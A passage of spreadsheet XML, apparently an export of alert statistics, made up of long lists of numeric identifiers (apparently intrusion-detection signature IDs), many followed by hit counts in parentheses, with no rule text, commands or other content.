2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2019524, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2003692, 2003747, 2003686, 2009190, 2011160, 2056027</t>
  </si>
  <si>
    <t>50447 (6280), 2009151 (2267), 2002 (665), 7070 (265), 2009714 (265), 2002681 (102), 1250 (94), 2003595 (92), 60401 (70), 2002731 (59), 59258 (57), 39348 (45), 2010920 (41), 1402 (28), 2101402 (28), 966 (26), 1002 (23), 2001218 (19), 31377 (18), 20258 (16), 38371 (14), 33294 (14), 12610 (14), 2101945 (14), 2002070 (14), 2021390 (14), 42465 (13), 31360 (13), 20654 (13), 2002996 (13), 1400 (10), 31940 (8), 2012911 (8), 2100981 (8), 56563 (7), 2003670 (7), 918 (6), 1244 (6), 2101244 (6), 2228 (5), 25975 (5), 1018 (5), 55647 (5), 2100988 (5), 2010963 (5), 2016184 (5), 2101018 (5), 20173 (4), 974 (4), 1827 (4), 20674 (4), 31362 (4), 2030337 (4), 2009001 (4), 2009180 (4), 2003715 (4), 1738 (3), 993 (3), 1401 (3), 1376 (3), 16431 (3), 1019 (3), 979 (3), 31013 (3), 20731 (3), 1254 (3), 2101738 (3), 2100993 (3), 2101401 (3), 2006609 (3), 2011040 (3), 2004589 (3), 2003739 (3), 2003333 (3), 2002901 (3), 1071 (2), 1029 (2), 2056 (2), 1828 (2), 7071 (2), 1667 (2), 43458 (2), 50921 (2), 1522 (2), 50923 (2), 27218 (2), 27192 (2), 16613 (2), 22097 (2), 2101071 (2), 2102056 (2), 2012913 (2), 2100982 (2), 2101403 (2), 2101332 (2), 2011564 (2), 2009167 (2), 2003740 (2), 2009382 (2), 2002879 (2), 2008897 (2), 2003738 (2), 2003699 (2), 2003677 (2), 2002815 (2), 2010027 (2), 2003731 (2), 2002800 (2), 2008922 (2), 2003698 (2), 2003717 (2), 2003706 (2), 2003707 (2), 2003708 (2), 2003709 (2), 2003711 (2), 2003713 (2), 2003712 (2), 2003710 (2), 2003714 (2), 2003867 (2), 2003693 (2), 2008996 (2), 2009179 (2), 1668 (1), 18742 (1), 1284 (1), 1256 (1), 509 (1), 1567 (1), 1080 (1), 1492 (1), 1048 (1), 1103 (1), 3674 (1), 2358 (1), 1491 (1), 1490 (1), 1088 (1), 15990 (1), 1834 (1), 61117 (1), 36037 (1), 1835 (1), 922 (1), 935 (1), 59237 (1), 1742 (1), 805 (1), 1193 (1), 978 (1), 21161 (1), 60573 (1), 1434 (1), 1433 (1), 1489 (1), 1571 (1), 2141 (1), 17410 (1), 50924 (1), 50925 (1), 50922 (1), 41817 (1), 25977 (1), 20663 (1), 64480 (1), 28912 (1), 31637 (1), 20632 (1), 2143 (1), 27230 (1), 28957 (1), 27688 (1), 43724 (1), 43691 (1), 20656 (1), 20728 (1), 1399 (1), 31638 (1), 59332 (1), 1091 (1), 20651 (1), 20826 (1), 44133 (1), 31419 (1), 43392 (1), 18478 (1), 27284 (1), 20732 (1), 31568 (1), 24502 (1), 22064 (1), 2002677 (1), 2001343 (1), 2101256 (1), 2001949 (1), 2004592 (1), 2020296 (1), 2101193 (1), 2101489 (1), 2016182 (1), 2011696 (1), 2010377 (1), 2009435 (1), 2010095 (1), 2009317 (1), 2009318 (1), 2009397 (1), 2009931 (1), 2009848 (1), 2009321 (1), 2010475 (1), 2009311 (1), 2009313 (1), 2012795 (1), 2009367 (1), 2009757 (1), 2009758 (1), 2009759 (1), 2009755 (1), 2009756 (1), 2009760 (1), 2009754 (1), 2009466 (1), 2009467 (1), 2009468 (1), 2009384 (1), 2009059 (1), 2009060 (1), 2009061 (1), 2009062 (1), 2009877 (1), 2009391 (1), 2009369 (1), 2012369 (1), 2010485 (1), 2009871 (1), 2009872 (1), 2009873 (1), 2009196 (1), 2010099 (1), 2009459 (1), 2009898 (1), 2009166 (1), 2003682 (1), 2003704 (1), 2010260 (1), 2009933 (1), 2012013 (1), 2008826 (1), 2009307 (1), 2009051 (1), 2010354 (1), 2009788 (1), 2003678 (1), 2003679 (1), 2009225 (1), 2010252 (1), 2008833 (1), 2010355 (1), 2009793 (1), 2009163 (1), 2003688 (1), 2003696 (1), 2009892 (1), 2009398 (1), 2003703 (1), 2003729 (1), 2003728 (1), 2003727 (1), 2003726 (1), 2009316 (1), 2009101 (1), 2010197 (1), 2008904 (1), 2008903 (1), 2010276 (1), 2008900 (1), 2008901 (1), 2008902 (1), 2010126 (1), 2003671 (1), 2010466 (1), 2009427 (1), 2002902 (1), 2008871 (1), 2003680 (1), 2003701 (1), 2008879 (1), 2010362 (1), 2009381 (1), 2009386 (1), 2010473 (1), 2009188 (1), 2009903 (1), 2008899 (1), 2003737 (1), 2003517 (1), 2009932 (1), 2011274 (1), 2003732 (1), 2003733 (1), 2003718 (1), 2003700 (1), 2003689 (1), 2009364 (1), 2010124 (1), 2010564 (1), 2010125 (1), 2003331 (1), 2011384 (1), 2011259 (1), 2003672 (1), 2003673 (1), 2003674 (1), 2003675 (1), 2003676 (1), 2009415 (1), 2003660 (1), 2003661 (1), 2003664 (1), 2010484 (1), 2003662 (1), 2009372 (1), 2003663 (1), 2003665 (1), 2003666 (1), 2003667 (1), 2003668 (1), 2003681 (1), 2003694 (1), 2002898 (1), 2009887 (1), 2003705 (1), 2009370 (1), 2009371 (1), 2008964 (1), 2009504 (1), 2009502 (1), 2009723 (1), 2003702 (1), 2009325 (1), 2009326 (1), 2008962 (1), 2009164 (1), 2003720 (1), 2003719 (1), 2003721 (1), 2009123 (1), 2009506 (1), 2009229 (1), 2003741 (1), 2003743 (1), 2003744 (1), 2003745 (1), 2009071 (1), 2019524 (1), 2009333 (1), 2009733 (1), 2003669 (1), 2009656 (1), 2009653 (1), 2009378 (1), 2009717 (1), 2009379 (1), 2014180 (1), 2010254 (1), 2003716 (1), 2003692 (1), 2003747 (1), 2003686 (1), 2009190 (1), 2011160 (1), 2056027 (1)</t>
  </si>
  <si>
    <t>50447, 2009151, 2002, 7070, 2009714, 2002681, 1250, 2003595, 60401, 2002731, 59258, 39348, 2010920, 1402, 2101402, 966, 1002, 2001218, 31377, 20258, 38371, 33294, 12610, 2101945, 2002070, 2021390, 42465, 31360, 20654, 2002996, 1400, 31940, 2012911, 2100981, 56563, 2003670, 918, 1244, 2101244, 2228, 25975, 1018, 55647, 2100988, 2010963, 2016184, 2101018, 20173, 974, 1827, 20674, 31362, 2030337, 2009001, 2009180, 2003715, 1738, 993, 1401, 1376, 16431, 1019, 979, 31013, 20731, 1254, 2101738, 2100993, 2101401, 2006609, 2011040, 2004589, 2003739, 2003333, 2002901, 1071, 1029, 2056, 1828, 7071, 1667, 43458, 50921, 1522, 50923, 27218, 27192, 16613, 22097, 2101071, 2102056, 2012913, 2100982, 2101403, 2101332, 2011564, 2009167, 2003740, 2009382, 2002879, 2008897, 2003738, 2003699, 2003677, 2002815, 2010027, 2003731, 2002800, 2008922, 2003698, 2003717, 2003706, 2003707, 2003708, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2008996, 2009179, 1668, 18742, 1284, 1256, 509, 1567, 1080, 1492, 1048, 1103, 3674, 2358, 1491, 1490, 1088, 15990, 1834, 61117, 36037, 1835, 922, 935, 59237, 1742, 805, 1193, 978, 21161, 60573, 1434, 1433, 1489, 1571, 2141, 17410, 50924, 50925, 50922, 41817, 25977, 20663, 64480, 28912, 31637, 20632, 2143, 27230, 28957, 27688, 43724, 43691, 20656, 20728, 1399, 31638, 59332, 1091, 20651, 20826, 44133, 31419, 43392, 18478, 27284, 20732, 31568, 24502, 22064, 2002677, 2001343, 2101256, 2001949, 2004592, 2020296, 2101193, 2101489, 2016182, 2011696, 2010377, 2009435, 2010095, 2009317, 2009318, 2009397, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2010485, 2009871, 2009872, 2009873, 2009196, 2010099, 2009459, 2009898, 2009166, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2009788, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2009163, 2003688, 2003696, 2009892, 2009398, 2003703, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2009427, 2002902, 2008871, 2003680, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2003737, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2019524, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2003692, 2003747, 2003686, 2009190, 2011160, 2056027</t>
  </si>
  <si>
    <t>2002 (665), 1250 (94), 1402 (28), 966 (26), 1002 (23), 1400 (10), 918 (6), 1244 (6), 2228 (5), 1018 (5), 974 (4), 1827 (4), 1738 (3), 993 (3), 1401 (3), 1376 (3), 1019 (3), 979 (3), 1254 (3), 1071 (2), 1029 (2), 2056 (2), 1828 (2), 1667 (2), 1522 (2), 1668 (1), 1284 (1), 1256 (1), 509 (1), 1567 (1), 1080 (1), 1492 (1), 1048 (1), 1103 (1), 2358 (1), 1491 (1), 1490 (1), 1088 (1), 1834 (1), 1835 (1), 922 (1), 935 (1), 1742 (1), 805 (1), 1193 (1), 978 (1), 1434 (1), 1433 (1), 1489 (1), 1571 (1), 2141 (1), 2143 (1), 1399 (1), 1091 (1)</t>
  </si>
  <si>
    <t>2002, 1250, 1402, 966, 1002, 1400, 918, 1244, 2228, 1018, 974, 1827, 1738, 993, 1401, 1376, 1019, 979, 1254, 1071, 1029, 2056, 1828, 1667, 1522, 1668, 1284, 1256, 509, 1567, 1080, 1492, 1048, 1103, 2358, 1491, 1490, 1088, 1834, 1835, 922, 935, 1742, 805, 1193, 978, 1434, 1433, 1489, 1571, 2141, 2143, 1399, 1091</t>
  </si>
  <si>
    <t>2002 (665), 2009714 (265), 1250 (94), 60401 (70), 2010920 (41), 2101402 (28), 1402 (28), 966 (26), 1002 (23), 2021390 (14), 1400 (10), 2100981 (8), 2101244 (6), 918 (6), 1244 (6), 25975 (5), 2006446 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2228 (5), 1018 (5), 2030337 (4), 974 (4), 1827 (4), 16431 (3), 2100993 (3), 2101401 (3), 2011042 (3), 2002901 (3), 1738 (3), 993 (3), 1401 (3), 1376 (3), 1019 (3), 979 (3), 1254 (3), 2101071 (2), 2100982 (2), 2101403 (2), 2011564 (2), 2002879 (2), 2008897 (2), 1071 (2), 1029 (2), 2056 (2), 1828 (2), 1667 (2), 1522 (2), 25977 (1), 2002677 (1), 2101256 (1), 2016182 (1), 2011696 (1), 2009317 (1), 2009318 (1), 2009931 (1), 2010475 (1), 2012795 (1), 2009384 (1), 2009391 (1), 2009369 (1), 2012369 (1), 2010485 (1), 2010260 (1), 2009933 (1), 2012013 (1), 2009051 (1), 2010354 (1), 2008833 (1), 2010355 (1), 2009892 (1), 2009316 (1), 2010197 (1), 2010276 (1), 2010466 (1), 2010362 (1), 2010473 (1), 2009932 (1), 2011274 (1), 2010124 (1), 2010564 (1), 2010125 (1), 2011384 (1), 2011259 (1), 2010484 (1), 2009887 (1), 2009325 (1), 2009326 (1), 2009229 (1), 2009071 (1), 2019524 (1), 2014180 (1), 2010254 (1), 1668 (1), 1284 (1), 1256 (1), 509 (1), 1567 (1), 1080 (1), 1492 (1), 1048 (1), 1103 (1), 2358 (1), 1491 (1), 1490 (1), 1088 (1), 1834 (1), 1835 (1), 922 (1), 935 (1), 1742 (1), 805 (1), 1193 (1), 978 (1), 1434 (1), 1433 (1), 1489 (1), 1571 (1), 2141 (1), 2143 (1), 1399 (1), 1091 (1)</t>
  </si>
  <si>
    <t>2002, 2009714, 1250, 60401, 2010920, 2101402, 1402, 966, 1002, 2021390, 1400, 2100981, 2101244, 918, 1244, 25975, 2006446, 2010963, 2016184, 2101018, 2228, 1018, 2030337, 974, 1827, 16431, 2100993, 2101401, 2011042, 2002901, 1738, 993, 1401, 1376, 1019, 979, 1254, 2101071, 2100982, 2101403, 2011564, 2002879, 2008897, 1071, 1029, 2056, 1828, 1667, 1522, 25977, 2002677, 2101256, 2016182, 2011696, 2009317, 2009318, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2010485, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2014180, 2010254, 1668, 1284, 1256, 509, 1567, 1080, 1492, 1048, 1103, 2358, 1491, 1490, 1088, 1834, 1835, 922, 935, 1742, 805, 1193, 978, 1434, 1433, 1489, 1571, 2141, 2143, 1399, 1091</t>
  </si>
  <si>
    <t>12 (166), 14 (5), 24342 (2), 19 (1), 21516 (1)</t>
  </si>
  <si>
    <t>12, 14, 24342, 19, 21516</t>
  </si>
  <si>
    <t>2049400 (150), 2016141 (39), 2009362 (24), 2009361 (23), 2027250 (17), 2017442 (17), 2101245 (13), 2027265 (12), 2019526 (11), 2100987 (8), 2100977 (8), 2017440 (6), 2101129 (4), 2101201 (4), 2101242 (3), 2027263 (3), 2027253 (3), 2101013 (3), 2027262 (2), 2018752 (2), 2101145 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2017441 (2), 2019714 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101487 (1), 2102073 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2017436 (1)</t>
  </si>
  <si>
    <t>2049400, 2016141, 2009362, 2009361, 2027250, 2017442, 2101245, 2027265, 2019526, 2100987, 2100977, 2017440, 2101129, 2101201, 2101242, 2027263, 2027253, 2101013, 2027262, 2018752, 2101145, 2010766, 2101016, 2101877, 2009485, 2017441, 2019714, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2101487, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2017436</t>
  </si>
  <si>
    <t>12 (166), 2049400 (150), 2016141 (39), 2009362 (24), 2009361 (23), 2027250 (17), 2017442 (17), 2101245 (13), 2027265 (12), 2019526 (11), 2100987 (8), 2100977 (8), 2017440 (6), 14 (5), 2101129 (4), 2101201 (4), 2101242 (3), 2027263 (3), 2027253 (3), 2101013 (3), 24342 (2), 2027262 (2), 2018752 (2), 2101145 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2017441 (2), 19 (1), 21516 (1), 2019714 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101487 (1), 2102073 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2017436 (1)</t>
  </si>
  <si>
    <t>12, 2049400, 2016141, 2009362, 2009361, 2027250, 2017442, 2101245, 2027265, 2019526, 2100987, 2100977, 2017440, 14, 2101129, 2101201, 2101242, 2027263, 2027253, 2101013, 24342, 2027262, 2018752, 2101145, 2010766, 2101016, 2101877, 2009485, 2017441, 19, 21516, 2019714, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2101487, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2017436</t>
  </si>
  <si>
    <t>41742 (493), 41188 (221), 12 (166), 1122 (150), 1560 (71), 2565 (39), 1301 (26), 1142 (26), 1288 (24), 882 (23), 2152 (14), 1245 (13), 41187 (13), 1147 (13), 42289 (11), 1774 (10), 977 (9), 1998 (9), 1385 (8), 1043 (8), 1044 (7), 1125 (6), 1286 (6), 2077 (6), 43356 (6), 1213 (6), 1875 (5), 14 (5), 928 (5), 1564 (5), 1500 (5), 1637 (5), 1129 (4), 1880 (4), 962 (4), 1826 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 40353 (4), 908 (4), 2410 (4), 1242 (3), 1848 (3), 911 (3), 49920 (3), 1013 (3), 1556 (3), 1131 (2), 1130 (2), 971 (2), 1145 (2), 1172 (2), 24342 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1231 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 17387 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1523 (2), 895 (2), 21515 (2), 2393 (2), 2295 (2), 43238 (1), 1852 (1), 40880 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 8492 (1), 43808 (1), 999 (1), 1486 (1), 857 (1), 3201 (1), 986 (1), 1482 (1), 1568 (1), 1772 (1), 1128 (1), 1076 (1), 53017 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 8493 (1), 1517 (1), 2154 (1), 1224 (1), 1611 (1), 2000 (1), 1157 (1), 1767 (1), 2347 (1), 2346 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 8490 (1), 915 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 41189 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 33613 (1), 33612 (1), 1004 (1), 19 (1), 2276 (1), 21516 (1), 20631 (1), 20633 (1), 20815 (1), 1671 (1), 2363 (1), 2285 (1), 2140 (1), 886 (1), 2281 (1), 2288 (1), 2298 (1), 23362 (1), 43285 (1)</t>
  </si>
  <si>
    <t>41742, 41188, 12, 1122, 1560, 2565, 1301, 1142, 1288, 882, 2152, 1245, 41187, 1147, 42289, 1774, 977, 1998, 1385, 1043, 1044, 1125, 1286, 2077, 43356, 1213, 1875, 14, 928, 1564, 1500, 1637, 1129, 1880, 962, 1826, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 40353, 908, 2410, 1242, 1848, 911, 49920, 1013, 1556, 1131, 1130, 971, 1145, 1172, 24342, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1231, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 2144, 43289, 1037, 1156, 17387, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1523, 895, 21515, 2393, 2295, 43238, 1852, 40880, 913, 914, 912, 985, 853, 8492, 43808, 999, 1486, 857, 3201, 986, 1482, 1568, 1772, 1128, 1076, 53017, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 8493, 1517, 2154, 1224, 1611, 2000, 1157, 1767, 2347, 2346, 1659, 910, 1722, 1108, 8490, 915, 1163, 2060, 1173, 1544, 936, 1230, 1743, 1540, 2138, 1168, 1407, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 818, 1032, 1033, 1034, 1035, 1036, 2142, 1527, 1526, 902, 1520, 1209, 1770, 1769, 33613, 33612, 1004, 19, 2276, 21516, 20631, 20633, 20815, 1671, 2363, 2285, 2140, 886, 2281, 2288, 2298, 23362, 43285</t>
  </si>
  <si>
    <t>2009885 (203), 2049400 (150), 2101122 (150), 2003099 (75), 2016141 (39), 2101288 (24), 2009362 (24), 2009361 (23), 2027250 (17), 2017442 (17), 2101245 (13), 2027265 (12), 2019526 (11), 2100987 (8), 2100977 (8), 2017440 (6), 2101129 (4), 2100937 (4), 2101201 (4), 2101242 (3), 2027263 (3), 2027253 (3), 2101013 (3), 2009884 (3), 2002752 (2), 2002749 (2), 2027262 (2), 2018752 (2), 2100971 (2), 2101145 (2), 2010767 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2101156 (2), 2100884 (2), 2017441 (2), 2101852 (1), 2019714 (1), 2014379 (1), 2011031 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2101847 (1), 2101111 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101023 (1), 2101487 (1), 2102073 (1), 2102131 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2101110 (1), 2002133 (1), 2017436 (1)</t>
  </si>
  <si>
    <t>2009885, 2049400, 2101122, 2003099, 2016141, 2101288, 2009362, 2009361, 2027250, 2017442, 2101245, 2027265, 2019526, 2100987, 2100977, 2017440, 2101129, 2100937, 2101201, 2101242, 2027263, 2027253, 2101013, 2009884, 2002752, 2002749, 2027262, 2018752, 2100971, 2101145, 2010767, 2010766, 2101016, 2101877, 2009485, 2101156, 2100884, 2017441, 2101852, 2019714, 2014379, 2011031, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2101023, 2101487, 2102073, 2102131, 2049402, 2101874, 2100953, 2100951, 2100959, 2101110, 2002133, 2017436</t>
  </si>
  <si>
    <t>41742 (493), 41188 (221), 2009885 (203), 12 (166), 1122 (150), 2049400 (150), 2101122 (150), 2003099 (75), 1560 (71), 2565 (39), 2016141 (39), 1301 (26), 1142 (26), 1288 (24), 2101288 (24), 2009362 (24), 882 (23), 2009361 (23), 2027250 (17), 2017442 (17), 2152 (14), 1245 (13), 41187 (13), 1147 (13), 2101245 (13), 2027265 (12), 42289 (11), 2019526 (11), 1774 (10), 977 (9), 1998 (9), 1385 (8), 1043 (8), 2100987 (8), 2100977 (8), 1044 (7), 1125 (6), 1286 (6), 2077 (6), 43356 (6), 1213 (6), 2017440 (6), 1875 (5), 14 (5), 928 (5), 1564 (5), 1500 (5), 1637 (5), 1129 (4), 1880 (4), 962 (4), 1826 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 40353 (4), 908 (4), 2410 (4), 2101129 (4), 2100937 (4), 2101201 (4), 1242 (3), 1848 (3), 911 (3), 49920 (3), 1013 (3), 1556 (3), 2101242 (3), 2027263 (3), 2027253 (3), 2101013 (3), 2009884 (3), 1131 (2), 1130 (2), 971 (2), 1145 (2), 1172 (2), 24342 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1231 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 17387 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1523 (2), 895 (2), 21515 (2), 2393 (2), 2295 (2), 2002752 (2), 2002749 (2), 2027262 (2), 2018752 (2), 2100971 (2), 2101145 (2), 2010767 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2101156 (2), 2100884 (2), 2017441 (2), 43238 (1), 1852 (1), 40880 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 8492 (1), 43808 (1), 999 (1), 1486 (1), 857 (1), 3201 (1), 986 (1), 1482 (1), 1568 (1), 1772 (1), 1128 (1), 1076 (1), 53017 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 8493 (1), 1517 (1), 2154 (1), 1224 (1), 1611 (1), 2000 (1), 1157 (1), 1767 (1), 2347 (1), 2346 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 8490 (1), 915 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 41189 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 33613 (1), 33612 (1), 1004 (1), 19 (1), 2276 (1), 21516 (1), 20631 (1), 20633 (1), 20815 (1), 1671 (1), 2363 (1), 2285 (1), 2140 (1), 886 (1), 2281 (1), 2288 (1), 2298 (1), 23362 (1), 43285 (1), 2101852 (1), 2019714 (1), 2014379 (1), 2011031 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2101847 (1), 2101111 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 